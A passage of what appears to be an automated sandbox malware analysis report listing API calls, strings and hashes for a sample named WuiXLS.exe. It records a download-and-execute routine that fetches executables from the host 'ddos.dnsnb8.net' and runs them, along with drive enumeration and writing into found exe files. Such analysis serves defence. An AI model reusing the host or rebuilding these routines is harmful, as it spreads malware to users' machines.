                                          • lstrcat.KERNEL32(?,00414818), ref: 0089EE2E
                                          • lstrcat.KERNEL32(?,0061852C), ref: 0089EE42
                                          • lstrcat.KERNEL32(?,0041481C), ref: 0089EE54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat
                                          • String ID:
                                          • API String ID: 4038537762-0
                                          • Opcode ID: 17f3b2e12a8e052ac4a5b08d4ce3d33ccb97d8600d17890a450db1d34e2e4e70
                                          • Instruction ID: 1e457c323344c1b0d552e4767d8daf4b04f7f560a16d7ca582366b2ff8db6e56
                                          • Opcode Fuzzy Hash: 17f3b2e12a8e052ac4a5b08d4ce3d33ccb97d8600d17890a450db1d34e2e4e70
                                          • Instruction Fuzzy Hash: 55219576904208AFDB14FBB4DC86DE9377AEBA4700F048546B649D3581EE749AC48B92
                                          APIs
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040EBAA
                                          • lstrcat.KERNEL32(?,00414818), ref: 0040EBC7
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040EBDB
                                          • lstrcat.KERNEL32(?,0041481C), ref: 0040EBED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat
                                          • String ID:
                                          • API String ID: 4038537762-0
                                          • Opcode ID: fa6d5197ec8c1ffe68bde41e0d487440f9f90d648d6eb64e1d3ea5ac28aea448
                                          • Instruction ID: 87290655d41cbd68318cc685ddaeb870d4aec506c0115cc15e8e73b125a14c28
                                          • Opcode Fuzzy Hash: fa6d5197ec8c1ffe68bde41e0d487440f9f90d648d6eb64e1d3ea5ac28aea448
                                          • Instruction Fuzzy Hash: 4C21D77AA00208AFC714FBB0DC82ED9737EDB58704F04854BF64953091DE789AC48B95

                                          Execution Graph

                                          Execution Coverage:31.1%
                                          Dynamic/Decrypted Code Coverage:10.5%
                                          Signature Coverage:18.9%
                                          Total number of Nodes:296
                                          Total number of Limit Nodes:11

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available

                                          Control-flow Graph

                                          (control-flow graph of the function at 007029E2; rendered interactively in the report, node and edge list not reproduced)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                          • String ID: %s*$C:\$Documents and Settings
                                          • API String ID: 2826467728-110786608
                                          • Opcode ID: 54d5d33a78fd6b2dbb0184cb34dc5ae1ec941c097939f298b13a365dbe82e152
                                          • Instruction ID: 6d0ba62460ddf2ecdf65b0b4db7d8cfc61defcf15850017bb39b3e12f9a1f05c
                                          • Opcode Fuzzy Hash: 54d5d33a78fd6b2dbb0184cb34dc5ae1ec941c097939f298b13a365dbe82e152
                                          • Instruction Fuzzy Hash: 3A4152B3405349EFD721DBA0DC4DDDB77ECEB84315F044A2AF944C2152EA38D64987A6

                                          Control-flow Graph

                                          (control-flow graph of the function at 00701099; rendered interactively in the report, node and edge list not reproduced)
                                          APIs
                                            • Part of subcall function 0070185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00701118), ref: 00701867
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701878
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701880
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701890
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701894
                                          • WinExec.KERNEL32(?,00000005), ref: 007010F1
                                          • lstrlen.KERNEL32(00704748), ref: 007010FA
                                          • wsprintfA.USER32 ref: 0070112A
                                          • wsprintfA.USER32 ref: 00701143
                                          • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0070115B
                                          • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00701169
                                          • Sleep.KERNEL32 ref: 00701179
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                          • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGp$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                          • API String ID: 1280626985-378087252
                                          • Opcode ID: 89871567087833f914b5a8883468c6877a1052b054711eca064c9dee4d805260
                                          • Instruction ID: ada5f21aaa57950f5279c9a254f1ce46a14f41be0fb6f02d9db1f54a25f5e290
                                          • Opcode Fuzzy Hash: 89871567087833f914b5a8883468c6877a1052b054711eca064c9dee4d805260
                                          • Instruction Fuzzy Hash: 852141B5901208FADB10DBA0DC49FAEBBFDAB05315F518365E600A2091DB7C5B84CF64

                                          Control-flow Graph

                                          (control-flow graph of the function at 00701718; rendered interactively in the report, node and edge list not reproduced)
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 00701729
                                          • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0070174C
                                          • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0070177C
                                          • __aulldiv.LIBCMT ref: 00701796
                                          • __aulldiv.LIBCMT ref: 007017A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: TimeValue__aulldiv$FileSystem
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe$SOFTWARE\GTplus$Time
                                          • API String ID: 541852442-378230927
                                          • Opcode ID: 1c349b4f9a32ae62ecb139c22294d73a7fc981c40907816bf11e454e65536f17
                                          • Instruction ID: a580d07444a5c55c437e27dabd4f14449c78e2bd43295c3cfbaf0677d707b96d
                                          • Opcode Fuzzy Hash: 1c349b4f9a32ae62ecb139c22294d73a7fc981c40907816bf11e454e65536f17
                                          • Instruction Fuzzy Hash: 221146B6A00209FBEB109B94CC89FEF7BFCEB44B14F508215FA01B61C1D6799A44CB64

                                          Control-flow Graph

                                          (control-flow graph of the function at 00706076; rendered interactively in the report, node and edge list not reproduced)
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 007060BE
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 007060DF
                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00706189
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007061A5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: e94ffecb875d58df5d0cc90198889298c88680d6f519af059b9fb671a4c27547
                                          • Instruction ID: 07f79b80a43e884d73c551560e9f98f7c6263a2a68814b04f44720fd630cfb0f
                                          • Opcode Fuzzy Hash: e94ffecb875d58df5d0cc90198889298c88680d6f519af059b9fb671a4c27547
                                          • Instruction Fuzzy Hash: A71212B2508785DFDB328F24CC65BEA7BE0EF02310F18469DE9858B1D3D678A921C751

                                          Control-flow Graph

                                          (control-flow graph of the function at 00702B8C; rendered interactively in the report, node and edge list not reproduced)
                                          APIs
                                          • memset.MSVCRT ref: 00702BA6
                                          • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00702BB4
                                          • GetDriveTypeA.KERNELBASE(?), ref: 00702BD3
                                          • CreateThread.KERNELBASE(00000000,00000000,00702B7D,?,00000000,00000000), ref: 00702BEE
                                          • lstrlen.KERNEL32(?), ref: 00702BFB
                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00702C16
                                          • CreateThread.KERNEL32(00000000,00000000,00702845,00000000,00000000,00000000), ref: 00702C3A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                          • String ID:
                                          • API String ID: 1073171358-0
                                          • Opcode ID: 2f419bda6c505a2e42530f0a325f080098158e47c3fce256de95382b7116b2a4
                                          • Instruction ID: 1c668139b55c9ef094bb9bd4a712753be7de710985984c3a492a38fa0c428c9d
                                          • Opcode Fuzzy Hash: 2f419bda6c505a2e42530f0a325f080098158e47c3fce256de95382b7116b2a4
                                          • Instruction Fuzzy Hash: 182193F280015CEFE7209F649C88DAF7BADFB45344B144325F95692192EB688D07CB65

                                          Control-flow Graph

                                          (control-flow graph of the function at 00701E6E; rendered interactively in the report, node and edge list not reproduced)
                                          APIs
                                          • SetFileAttributesA.KERNELBASE(?,00000080,?,007032B0,00000164,00702986,?), ref: 00701EB9
                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00701ECD
                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00701EF3
                                          • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00701F07
                                          • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000400), ref: 00701F1D
                                          • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0070201E
                                          • memset.MSVCRT ref: 007020D8
                                          • memset.MSVCRT ref: 007020EA
                                          • memcpy.MSVCRT ref: 0070222D
                                          • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00702238
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0070224A
                                          • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 007022C6
                                          • SetEndOfFile.KERNELBASE(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 007022CB
                                          • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 007022DD
                                          • WriteFile.KERNELBASE(000000FF,00704008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 007022F7
                                          • WriteFile.KERNELBASE(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0070230D
                                          • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00702322
                                          • UnmapViewOfFile.KERNEL32(?,?,007032B0,00000164,00702986,?), ref: 00702340
                                          • FindCloseChangeNotification.KERNELBASE(?,?,007032B0,00000164,00702986,?), ref: 0070234E
                                          • CloseHandle.KERNEL32(000000FF,?,007032B0,00000164,00702986,?), ref: 00702359
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                          • String ID: .@p$5@p$<@p$C@p$m@p
                                          • API String ID: 3349749541-394526410
                                          • Opcode ID: a2e237cc42a149fb0adc03402d2976e38c0b85c8983f514e1ea962eb1f28f35d
                                          • Instruction ID: a9799bf61e222c73cff8608772714633df324ea72f4b3c6eb06bc55da2c6e28c
                                          • Opcode Fuzzy Hash: a2e237cc42a149fb0adc03402d2976e38c0b85c8983f514e1ea962eb1f28f35d
                                          • Instruction Fuzzy Hash: 5DF18471900209EFDB20DFA4DC89AADBBF5FF08314F10862AE519A7691D738AD42CF54

                                          Control-flow Graph

                                          (control-flow graph of the function at 00701973; rendered interactively in the report, node and edge list not reproduced)
                                          APIs
                                          • PathFileExistsA.KERNELBASE(\Np`Np,00000000,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 00701992
                                          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 007019BA
                                          • Sleep.KERNEL32(00000064), ref: 007019C6
                                          • wsprintfA.USER32 ref: 007019EC
                                          • CopyFileA.KERNEL32(?,?,00000000), ref: 00701A00
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00701A1E
                                          • GetFileSize.KERNEL32(?,00000000), ref: 00701A2C
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00701A46
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00701A65
                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00701A90
                                          • DeleteFileA.KERNEL32(?), ref: 00701AA7
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00701AC1
                                          Strings
                                          • \Np`Np, xrefs: 00701980
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 007019DB
                                          • %s%.8X.data, xrefs: 007019E6
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 0070197C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                          • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WuiXLS.exe$\Np`Np
                                          • API String ID: 2523042076-1186948972
                                          • Opcode ID: d802474b7b0daea8fcccd57dd6788eef08be2de70f6c5864e6395e74ba158e0f
                                          • Instruction ID: c52c57f148b9731a6bce77fc3256249cad7ebc8869c8b0817514e50a1dabb279
                                          • Opcode Fuzzy Hash: d802474b7b0daea8fcccd57dd6788eef08be2de70f6c5864e6395e74ba158e0f
                                          • Instruction Fuzzy Hash: 5E514EB1A01219EFDB109F98CD84AAEBBFDFB04354F508669F515E62D0D7789E40CBA0

                                          Control-flow Graph

                                          (control-flow graph of the function at 007028B8; rendered interactively in the report, node and edge list not reproduced)
                                          APIs
                                          • memset.MSVCRT ref: 007028D3
                                          • wsprintfA.USER32 ref: 007028F7
                                          • memset.MSVCRT ref: 00702925
                                          • wsprintfA.USER32 ref: 00702940
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702A02
                                            • Part of subcall function 007029E2: wsprintfA.USER32 ref: 00702A1A
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702A44
                                            • Part of subcall function 007029E2: lstrlen.KERNEL32(?), ref: 00702A54
                                            • Part of subcall function 007029E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00702A6C
                                            • Part of subcall function 007029E2: strrchr.MSVCRT ref: 00702A7C
                                            • Part of subcall function 007029E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00702A9F
                                            • Part of subcall function 007029E2: lstrlen.KERNEL32(Documents and Settings), ref: 00702AAE
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702AC6
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702ADA
                                            • Part of subcall function 007029E2: FindFirstFileA.KERNELBASE(?,?), ref: 00702AEF
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702B13
                                          • strrchr.MSVCRT ref: 00702959
                                          • lstrcmpiA.KERNEL32(00000001,exe), ref: 00702974
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                          • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                          • API String ID: 3004273771-1035934456
                                          • Opcode ID: c35904a71feed9eb640f0aed938a097f38bfbff6dcf716d7b87aa9f5aed24218
                                          • Instruction ID: 30cfcce38ede8fa8b5d55b17d8a838cc12adfbe2c1d12ceeff79ed9c2e4ed2ff
                                          • Opcode Fuzzy Hash: c35904a71feed9eb640f0aed938a097f38bfbff6dcf716d7b87aa9f5aed24218
                                          • Instruction Fuzzy Hash: 923197B394031DFBDB209764DC8DFDA77DCAB14314F154652F545A20C2DABCAAC58BA0

                                          Control-flow Graph

                                          APIs
                                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0070164F
                                          • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0070165B
                                          • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\WuiXLS.exe,00000104), ref: 0070166E
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 007016AC
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 007016BD
                                            • Part of subcall function 0070139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 007013BC
                                            • Part of subcall function 0070139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 007013DA
                                            • Part of subcall function 0070139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00701448
                                          • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 007016E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WuiXLS.exe$C:\Windows\system32$Documents and Settings
                                          • API String ID: 123563730-3936800671
                                          • Opcode ID: 61f1b741d19f63539be094861b4322d72f727848ffb0ddb97ab9bc395b99fa4d
                                          • Instruction ID: 4ddcc515614a62a53ebcfd4beed9c24d235e900aeb766d2875f6d41d0477ab5c
                                          • Opcode Fuzzy Hash: 61f1b741d19f63539be094861b4322d72f727848ffb0ddb97ab9bc395b99fa4d
                                          • Instruction Fuzzy Hash: C411B6B1502214FBDB2167A59D4DE9B3EEEEB45361F408315F309910E0CE7D8940C7B5

                                          Control-flow Graph

                                          (graph image omitted; basic blocks 702c48-702ccc, calling memset, CreateThread, WaitForMultipleObjects and VirtualFree, with a subcall to 701973)
                                          APIs
                                          • memset.MSVCRT ref: 00702C57
                                            • Part of subcall function 00701973: PathFileExistsA.KERNELBASE(\Np`Np,00000000,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 00701992
                                            • Part of subcall function 00701973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 007019BA
                                            • Part of subcall function 00701973: Sleep.KERNEL32(00000064), ref: 007019C6
                                            • Part of subcall function 00701973: wsprintfA.USER32 ref: 007019EC
                                            • Part of subcall function 00701973: CopyFileA.KERNEL32(?,?,00000000), ref: 00701A00
                                            • Part of subcall function 00701973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00701A1E
                                            • Part of subcall function 00701973: GetFileSize.KERNEL32(?,00000000), ref: 00701A2C
                                            • Part of subcall function 00701973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00701A46
                                            • Part of subcall function 00701973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00701A65
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00702C99
                                          • WaitForMultipleObjects.KERNEL32(00000001,007016BA,00000001,000000FF,?,007016BA,00000000), ref: 00702CAC
                                          • VirtualFree.KERNEL32(001E0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\WuiXLS.exe,00704E5C,00704E60,?,007016BA,00000000), ref: 00702CC2
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 00702C69
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                          • API String ID: 2042498389-449498752
                                          • Opcode ID: 707d425b1d4eaec5befb9ed6ee52f9d60eb756f36f27457663a2ab2e9cd257f6
                                          • Instruction ID: 292040b32ff5c4f3478fe320ba09a9a140acdd37c139c02ed2b61eb4ba82afb4
                                          • Opcode Fuzzy Hash: 707d425b1d4eaec5befb9ed6ee52f9d60eb756f36f27457663a2ab2e9cd257f6
                                          • Instruction Fuzzy Hash: A70184B2641220FAE710A795DC0EE9F7EDDEF01B50F108314B605D61C2D9A89900C7B4

                                          Control-flow Graph

                                          (graph image omitted; basic blocks 7014e1-70157a, calling GetModuleHandleA, VirtualQuery and ExitProcess, with subcalls to 701638 and 701af9)
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00701504
                                          • VirtualQuery.KERNEL32(007014E1,?,0000001C), ref: 00701525
                                          • ExitProcess.KERNEL32 ref: 0070157A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: ExitHandleModuleProcessQueryVirtual
                                          • String ID:
                                          • API String ID: 3946701194-0
                                          • Opcode ID: c6951e3d452c3765452b5e428695616e0c42566d6b8917093235f2217dffbd12
                                          • Instruction ID: 266529a968c6d67ba6f948e3f7e6447ddc1fb9e244f22c8079b6aa57d417b019
                                          • Opcode Fuzzy Hash: c6951e3d452c3765452b5e428695616e0c42566d6b8917093235f2217dffbd12
                                          • Instruction Fuzzy Hash: B2117CB1A01204DFCB20EFA5AC84A7D77FCEB84715B90832EF602DB190DA7C8941AB54

                                          Control-flow Graph

                                          (graph image omitted; basic blocks 701915-701970, calling memset, GetFileTime and SetFileTime)
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: FileTimememset
                                          • String ID:
                                          • API String ID: 176422537-0
                                          • Opcode ID: fdfcbb9c46d2722e58875f0401eec90482097419f705e76a873ec3d29bc18c0c
